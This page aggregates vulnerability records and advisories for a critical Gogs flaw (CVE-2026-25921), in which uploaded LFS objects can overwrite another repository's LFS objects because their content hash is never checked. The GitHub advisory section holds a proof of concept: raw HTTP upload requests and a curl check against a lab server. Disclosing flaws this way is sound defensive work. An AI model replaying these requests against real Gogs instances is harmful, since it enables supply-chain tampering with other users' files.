Vulnerability-Lookup

CVE-2026-25921 (GCVE-0-2026-25921)

Vulnerability from cvelistv5 – Published: 2026-03-05 18:36 – Updated: 2026-03-06 18:10

Title

Gogs: Cross-repository LFS object overwrite via missing content hash verification

Summary

Gogs is an open source self-hosted Git service. Prior to version 0.14.2, overwritable LFS object across different repos leads to supply-chain attack, all LFS objects are vulnerable to be maliciously overwritten by malicious attackers. This issue has been patched in version 0.14.2.

Severity ?

9.3 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L

CWE

CWE-345 - Insufficient Verification of Data Authenticity

Assigner

GitHub_M

References

URL

Tags

	https://github.com/gogs/gogs/security/advisories/…	x_refsource_CONFIRM
	https://github.com/gogs/gogs/pull/8166	x_refsource_MISC
	https://github.com/gogs/gogs/commit/81ee8836445ac…	x_refsource_MISC
	https://github.com/gogs/gogs/releases/tag/v0.14.2	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	gogs	gogs	Affected: < 0.14.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25921",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-06T18:10:40.475842Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-06T18:10:49.926Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "gogs",
          "vendor": "gogs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.14.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Gogs is an open source self-hosted Git service. Prior to version 0.14.2, overwritable LFS object across different repos leads to supply-chain attack, all LFS objects are vulnerable to be maliciously overwritten by malicious attackers. This issue has been patched in version 0.14.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 9.3,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-345",
              "description": "CWE-345: Insufficient Verification of Data Authenticity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-05T18:36:30.692Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/gogs/gogs/security/advisories/GHSA-cj4v-437j-jq4c",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/gogs/gogs/security/advisories/GHSA-cj4v-437j-jq4c"
        },
        {
          "name": "https://github.com/gogs/gogs/pull/8166",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/gogs/gogs/pull/8166"
        },
        {
          "name": "https://github.com/gogs/gogs/commit/81ee8836445ac888d99da8b652be7d5cbc5c4d5c",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/gogs/gogs/commit/81ee8836445ac888d99da8b652be7d5cbc5c4d5c"
        },
        {
          "name": "https://github.com/gogs/gogs/releases/tag/v0.14.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/gogs/gogs/releases/tag/v0.14.2"
        }
      ],
      "source": {
        "advisory": "GHSA-cj4v-437j-jq4c",
        "discovery": "UNKNOWN"
      },
      "title": "Gogs: Cross-repository LFS object overwrite via missing content hash verification"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25921",
    "datePublished": "2026-03-05T18:36:30.692Z",
    "dateReserved": "2026-02-09T16:22:17.785Z",
    "dateUpdated": "2026-03-06T18:10:49.926Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-25921\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-05T19:16:03.183\",\"lastModified\":\"2026-03-06T14:02:02.117\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Gogs is an open source self-hosted Git service. Prior to version 0.14.2, overwritable LFS object across different repos leads to supply-chain attack, all LFS objects are vulnerable to be maliciously overwritten by malicious attackers. This issue has been patched in version 0.14.2.\"},{\"lang\":\"es\",\"value\":\"Gogs es un servicio Git autoalojado de c\u00f3digo abierto. Antes de la versi\u00f3n 0.14.2, un objeto LFS sobrescribible entre diferentes repositorios conduce a un ataque a la cadena de suministro, todos los objetos LFS son vulnerables a ser sobrescritos maliciosamente por atacantes maliciosos. Este problema ha sido parcheado en la versi\u00f3n 0.14.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L\",\"baseScore\":9.3,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":4.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-345\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.14.2\",\"matchCriteriaId\":\"0EDBB1E3-57E4-4560-A44F-7C54FD21C8B9\"}]}]}],\"references\":[{\"url\":\"https://github.com/gogs/gogs/commit/81ee8836445ac888d99da8b652be7d5cbc5c4d5c\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/gogs/gogs/pull/8166\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/gogs/gogs/releases/tag/v0.14.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/gogs/gogs/security/advisories/GHSA-cj4v-437j-jq4c\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"Gogs: Cross-repository LFS object overwrite via missing content hash verification\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-345\", \"lang\": \"en\", \"description\": \"CWE-345: Insufficient Verification of Data Authenticity\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"LOW\", \"baseScore\": 9.3, \"baseSeverity\": \"CRITICAL\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"scope\": \"CHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/gogs/gogs/security/advisories/GHSA-cj4v-437j-jq4c\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/gogs/gogs/security/advisories/GHSA-cj4v-437j-jq4c\"}, {\"name\": \"https://github.com/gogs/gogs/pull/8166\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/gogs/gogs/pull/8166\"}, {\"name\": \"https://github.com/gogs/gogs/commit/81ee8836445ac888d99da8b652be7d5cbc5c4d5c\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/gogs/gogs/commit/81ee8836445ac888d99da8b652be7d5cbc5c4d5c\"}, {\"name\": \"https://github.com/gogs/gogs/releases/tag/v0.14.2\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/gogs/gogs/releases/tag/v0.14.2\"}], \"affected\": [{\"vendor\": \"gogs\", \"product\": \"gogs\", \"versions\": [{\"version\": \"\u003c 0.14.2\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-05T18:36:30.692Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Gogs is an open source self-hosted Git service. Prior to version 0.14.2, overwritable LFS object across different repos leads to supply-chain attack, all LFS objects are vulnerable to be maliciously overwritten by malicious attackers. This issue has been patched in version 0.14.2.\"}], \"source\": {\"advisory\": \"GHSA-cj4v-437j-jq4c\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-25921\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-06T18:10:40.475842Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-06T18:10:45.647Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-25921\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-02-09T16:22:17.785Z\", \"datePublished\": \"2026-03-05T18:36:30.692Z\", \"dateUpdated\": \"2026-03-06T18:10:49.926Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

WID-SEC-W-2026-0623

Vulnerability from csaf_certbund - Published: 2026-03-05 23:00 - Updated: 2026-03-05 23:00

Summary

Gogs: Mehrere Schwachstellen

Notes

Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung

Gogs ist ein einfacher Git-Server.

Angriff

Ein Angreifer kann mehrere Schwachstellen in Gogs ausnutzen, um Daten zu manipulieren, Cross-Site-Scripting-Angriffe durchzuführen oder vertrauliche Informationen offenzulegen.

Betroffene Betriebssysteme

- Sonstiges - UNIX

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "hoch"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "Gogs ist ein einfacher Git-Server.",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein Angreifer kann mehrere Schwachstellen in Gogs ausnutzen, um Daten zu manipulieren, Cross-Site-Scripting-Angriffe durchzuf\u00fchren oder vertrauliche Informationen offenzulegen.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Sonstiges\n- UNIX",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2026-0623 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0623.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2026-0623 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0623"
      },
      {
        "category": "external",
        "summary": "GitHub Advisory Database vom 2026-03-05",
        "url": "https://github.com/gogs/gogs/security/advisories/GHSA-cj4v-437j-jq4c"
      },
      {
        "category": "external",
        "summary": "GitHub Advisory Database vom 2026-03-05",
        "url": "https://github.com/gogs/gogs/security/advisories/GHSA-v9vm-r24h-6rqm"
      },
      {
        "category": "external",
        "summary": "GitHub Advisory Database vom 2026-03-05",
        "url": "https://github.com/gogs/gogs/security/advisories/GHSA-vgjm-2cpf-4g7c"
      },
      {
        "category": "external",
        "summary": "GitHub Advisory Database vom 2026-03-05",
        "url": "https://github.com/gogs/gogs/security/advisories/GHSA-vgvf-m4fw-938j"
      },
      {
        "category": "external",
        "summary": "GitHub Advisory Database vom 2026-03-05",
        "url": "https://github.com/gogs/gogs/security/advisories/GHSA-x9p5-w45c-7ffc"
      },
      {
        "category": "external",
        "summary": "GitHub Advisory Database vom 2026-03-05",
        "url": "https://github.com/gogs/gogs/security/advisories/GHSA-xrcr-gmf5-2r8j"
      }
    ],
    "source_lang": "en-US",
    "title": "Gogs: Mehrere Schwachstellen",
    "tracking": {
      "current_release_date": "2026-03-05T23:00:00.000+00:00",
      "generator": {
        "date": "2026-03-06T10:52:11.462+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.5.0"
        }
      },
      "id": "WID-SEC-W-2026-0623",
      "initial_release_date": "2026-03-05T23:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2026-03-05T23:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c0.14.2",
                "product": {
                  "name": "Open Source Gogs \u003c0.14.2",
                  "product_id": "T051468"
                }
              },
              {
                "category": "product_version",
                "name": "0.14.2",
                "product": {
                  "name": "Open Source Gogs 0.14.2",
                  "product_id": "T051468-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:gogs:gogs:0.14.2"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "Gogs"
          }
        ],
        "category": "vendor",
        "name": "Open Source"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-25921",
      "product_status": {
        "known_affected": [
          "T051468"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00",
      "title": "CVE-2026-25921"
    },
    {
      "cve": "CVE-2026-26022",
      "product_status": {
        "known_affected": [
          "T051468"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00",
      "title": "CVE-2026-26022"
    },
    {
      "cve": "CVE-2026-26194",
      "product_status": {
        "known_affected": [
          "T051468"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00",
      "title": "CVE-2026-26194"
    },
    {
      "cve": "CVE-2026-26195",
      "product_status": {
        "known_affected": [
          "T051468"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00",
      "title": "CVE-2026-26195"
    },
    {
      "cve": "CVE-2026-26196",
      "product_status": {
        "known_affected": [
          "T051468"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00",
      "title": "CVE-2026-26196"
    },
    {
      "cve": "CVE-2026-26276",
      "product_status": {
        "known_affected": [
          "T051468"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00",
      "title": "CVE-2026-26276"
    }
  ]
}

GHSA-CJ4V-437J-JQ4C

Vulnerability from github – Published: 2026-03-05 19:14 – Updated: 2026-03-05 22:28

Summary

Gogs: Cross-repository LFS object overwrite via missing content hash verification

Details

Summary

Overwritable LFS object across different repos leads to supply-chain attack, all LFS objects are vulnerable to be maliciously overwritten by malicious attackers.

Details

Gogs store all LFS objects in the same place, no isolation between different repositories. (repo id not concatenated to storage path) https://github.com/gogs/gogs/blob/7a2dffa95ac64f31c8322cb50d32694b05610144/internal/lfsutil/storage.go#L52-L58

Gogs does not verify uploaded LFS file content against its claimed SHA-256, meaning attackers can manipulate the uploaded file like injecting backdoor. https://github.com/gogs/gogs/blob/7a2dffa95ac64f31c8322cb50d32694b05610144/internal/lfsutil/storage.go#L79-L89

Here's the comment that trust client to retry upload allowing them to overwrite. However, this assumption does not hold in the case of a malicious client. https://github.com/gogs/gogs/blob/7a2dffa95ac64f31c8322cb50d32694b05610144/internal/route/lfs/basic.go#L111-L113

PoC

# ./gogs -v
Gogs version 0.13.0

1. User (admin1) upload a LFS object into their repository `admin1/testlfs.git` normally

POST http://172.29.121.170/admin1/testlfs.git/info/lfs/objects/batch
User-Agent: git-lfs/3.0.2 (GitHub; linux amd64; go 1.17.2)
Accept-Encoding: gzip, deflate, br
Accept: application/vnd.git-lfs+json
Connection: keep-alive
Content-Type: application/vnd.git-lfs+json
Authorization: Basic YWRtaW4xOjg2ZjgxMmNkNDBiODY1YmIzZGQ1NTgyNDI2OTE2M2FmNDM3ZGZjZWI=
Content-Length: 168

{"operation": "upload", "objects": [{"oid": "5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a", "size": 1048576}], "ref": {"name": "refs/heads/master"}}

response: <Response [200]>
Connection: close
Content-Length: 438
Content-Type: application/vnd.git-lfs+json
Date: Thu, 28 Nov 2024 13:57:47 GMT
Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647

{'objects': [{'actions': {'upload': {'header': {'Content-Type': 'application/octet-stream'},
                                     'href': 'http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a'},
                          'verify': {'href': 'http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/verify'}},
              'oid': '5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a',
              'size': 1048576}],
 'transfer': 'basic'}

[STEP3] file_upload PUT http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a
headers: {'Content-Type': 'application/octet-stream', 'Accept': 'application/vnd.git-lfs+json', 'Authorization': 'Basic YWRtaW4xOjg2ZjgxMmNkNDBiODY1YmIzZGQ1NTgyNDI2OTE2M2FmNDM3ZGZjZWI='}
response:  <Response [200]>
[verify POST] http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/verify
POST http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/verify
User-Agent: git-lfs/3.0.2 (GitHub; linux amd64; go 1.17.2)
Accept-Encoding: gzip, deflate, br
Accept: application/vnd.git-lfs+json
Connection: keep-alive
Content-Type: application/vnd.git-lfs+json
Authorization: Basic YWRtaW4xOjg2ZjgxMmNkNDBiODY1YmIzZGQ1NTgyNDI2OTE2M2FmNDM3ZGZjZWI=
Cookie: lang=en-US
Content-Length: 92

{"oid": "5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a", "size": 1048576}

response: <Response [200]>
Connection: close
Content-Length: 0
Date: Thu, 28 Nov 2024 13:57:47 GMT

In this step, upload a LFS object 5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a

2. Attacker `user2` overwrite this file by uploading manipulated content to their repo `user2/public.git`

PUT http://172.29.121.170:3000/user2/public.git/info/lfs/objects/basic/5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a
Content-Type: application/octet-stream
Accept: application/vnd.git-lfs+json
Authorization: Basic dXNlcjI6NTRmZGU5ZmI3YjdmOTQ0MmM3MzY4ODhlMWIyNjZmMWE4MzAyMzE5NQ==

response:  <Response [200]>

3. Verify the content has been overwritten:

# curl http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a -H "Authorization: Basic YWRtaW4xOjg2ZjgxMmNkNDBiODY1YmIzZGQ1NTgyNDI2OTE2M2FmNDM3ZGZjZWI=" -i
HTTP/1.1 200 OK
Content-Length: 1048576
Connection: keep-alive
Content-Type: application/octet-stream
Date: Thu, 28 Nov 2024 14:01:53 GMT
Keep-Alive: timeout=4
Proxy-Connection: keep-alive
Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647

curl: (18) transfer closed with 1048563 bytes remaining to read
2222 replaced

Impact

All LFS objects hosted on Gogs can be maliciously overwritten. Supply-chain attack is possible, and when user download LFS object from webpage, there's no warning at all.

Fix Suggestion

Uploaded LFS objects must be verified to ensure their content matches the claimed SHA-256 hash, to prevent the upload of tampered files.

Fix example: https://code.rhodecode.com/rhodecode-vcsserver/changeset/a680a60521bf02c29413d718ebca36c4f692ea4a?diffmode=unified

Severity ?

9.3 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.14.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "gogs.io/gogs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25921"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-05T19:14:41Z",
    "nvd_published_at": "2026-03-05T19:16:03Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nOverwritable LFS object across different repos leads to supply-chain attack, all LFS objects are vulnerable to be maliciously overwritten by malicious attackers.\n\n### Details\nGogs store all LFS objects in the same place, no isolation between different repositories. (repo id not concatenated to storage path) https://github.com/gogs/gogs/blob/7a2dffa95ac64f31c8322cb50d32694b05610144/internal/lfsutil/storage.go#L52-L58\n\nGogs does not verify uploaded LFS file content against its claimed SHA-256, meaning attackers can manipulate the uploaded file like injecting backdoor. https://github.com/gogs/gogs/blob/7a2dffa95ac64f31c8322cb50d32694b05610144/internal/lfsutil/storage.go#L79-L89\n\nHere\u0027s the comment that trust client to retry upload allowing them to overwrite. However, this assumption does not hold in the case of a malicious client.  https://github.com/gogs/gogs/blob/7a2dffa95ac64f31c8322cb50d32694b05610144/internal/route/lfs/basic.go#L111-L113\n\n### PoC\n\n```\n# ./gogs -v\nGogs version 0.13.0\n```\n\n#### 1. User (admin1) upload a LFS object into their repository `admin1/testlfs.git` normally\n\n```\nPOST http://172.29.121.170/admin1/testlfs.git/info/lfs/objects/batch\nUser-Agent: git-lfs/3.0.2 (GitHub; linux amd64; go 1.17.2)\nAccept-Encoding: gzip, deflate, br\nAccept: application/vnd.git-lfs+json\nConnection: keep-alive\nContent-Type: application/vnd.git-lfs+json\nAuthorization: Basic YWRtaW4xOjg2ZjgxMmNkNDBiODY1YmIzZGQ1NTgyNDI2OTE2M2FmNDM3ZGZjZWI=\nContent-Length: 168\n\n{\"operation\": \"upload\", \"objects\": [{\"oid\": \"5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a\", \"size\": 1048576}], \"ref\": {\"name\": \"refs/heads/master\"}}\n\nresponse: \u003cResponse [200]\u003e\nConnection: close\nContent-Length: 438\nContent-Type: application/vnd.git-lfs+json\nDate: Thu, 28 Nov 2024 13:57:47 GMT\nSet-Cookie: lang=en-US; Path=/; Max-Age=2147483647\n\n{\u0027objects\u0027: [{\u0027actions\u0027: {\u0027upload\u0027: {\u0027header\u0027: {\u0027Content-Type\u0027: \u0027application/octet-stream\u0027},\n                                     \u0027href\u0027: \u0027http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a\u0027},\n                          \u0027verify\u0027: {\u0027href\u0027: \u0027http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/verify\u0027}},\n              \u0027oid\u0027: \u00275f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a\u0027,\n              \u0027size\u0027: 1048576}],\n \u0027transfer\u0027: \u0027basic\u0027}\n\n[STEP3] file_upload PUT http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a\nheaders: {\u0027Content-Type\u0027: \u0027application/octet-stream\u0027, \u0027Accept\u0027: \u0027application/vnd.git-lfs+json\u0027, \u0027Authorization\u0027: \u0027Basic YWRtaW4xOjg2ZjgxMmNkNDBiODY1YmIzZGQ1NTgyNDI2OTE2M2FmNDM3ZGZjZWI=\u0027}\nresponse:  \u003cResponse [200]\u003e\n[verify POST] http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/verify\nPOST http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/verify\nUser-Agent: git-lfs/3.0.2 (GitHub; linux amd64; go 1.17.2)\nAccept-Encoding: gzip, deflate, br\nAccept: application/vnd.git-lfs+json\nConnection: keep-alive\nContent-Type: application/vnd.git-lfs+json\nAuthorization: Basic YWRtaW4xOjg2ZjgxMmNkNDBiODY1YmIzZGQ1NTgyNDI2OTE2M2FmNDM3ZGZjZWI=\nCookie: lang=en-US\nContent-Length: 92\n\n{\"oid\": \"5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a\", \"size\": 1048576}\n\nresponse: \u003cResponse [200]\u003e\nConnection: close\nContent-Length: 0\nDate: Thu, 28 Nov 2024 13:57:47 GMT\n```\n\nIn this step, upload a LFS object `5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a`\n\n#### 2. Attacker `user2` overwrite this file by uploading manipulated content to their repo `user2/public.git`\n\n```\nPUT http://172.29.121.170:3000/user2/public.git/info/lfs/objects/basic/5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a\nContent-Type: application/octet-stream\nAccept: application/vnd.git-lfs+json\nAuthorization: Basic dXNlcjI6NTRmZGU5ZmI3YjdmOTQ0MmM3MzY4ODhlMWIyNjZmMWE4MzAyMzE5NQ==\n\nresponse:  \u003cResponse [200]\u003e\n```\n\n#### 3. Verify the content has been overwritten:\n\n```\n# curl http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a -H \"Authorization: Basic YWRtaW4xOjg2ZjgxMmNkNDBiODY1YmIzZGQ1NTgyNDI2OTE2M2FmNDM3ZGZjZWI=\" -i\nHTTP/1.1 200 OK\nContent-Length: 1048576\nConnection: keep-alive\nContent-Type: application/octet-stream\nDate: Thu, 28 Nov 2024 14:01:53 GMT\nKeep-Alive: timeout=4\nProxy-Connection: keep-alive\nSet-Cookie: lang=en-US; Path=/; Max-Age=2147483647\n\ncurl: (18) transfer closed with 1048563 bytes remaining to read\n2222 replaced\n```\n\n### Impact\nAll LFS objects hosted on Gogs can be maliciously overwritten. Supply-chain attack is possible, and when user download LFS object from webpage, there\u0027s no warning at all. \n\n### Fix Suggestion\n\nUploaded LFS objects must be verified to ensure their content matches the claimed SHA-256 hash, to prevent the upload of tampered files.\n\nFix example: https://code.rhodecode.com/rhodecode-vcsserver/changeset/a680a60521bf02c29413d718ebca36c4f692ea4a?diffmode=unified",
  "id": "GHSA-cj4v-437j-jq4c",
  "modified": "2026-03-05T22:28:32Z",
  "published": "2026-03-05T19:14:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-cj4v-437j-jq4c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25921"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/pull/8166"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/commit/81ee8836445ac888d99da8b652be7d5cbc5c4d5c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gogs/gogs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/releases/tag/v0.14.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gogs: Cross-repository LFS object overwrite via missing content hash verification"
}

FKIE_CVE-2026-25921

Vulnerability from fkie_nvd - Published: 2026-03-05 19:16 - Updated: 2026-03-06 14:02

Severity ?

9.3 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L

Summary

